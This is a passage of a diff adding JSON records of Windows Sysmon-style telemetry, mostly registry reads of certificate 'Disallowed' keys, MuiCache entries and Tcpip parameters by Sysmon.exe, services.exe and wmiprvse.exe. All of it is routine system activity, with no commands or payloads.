"registry_value": "CTLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "utildll.dll", + "image_path": "C:\\Windows\\System32\\utildll.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847770000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3808, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3808, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3808, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + 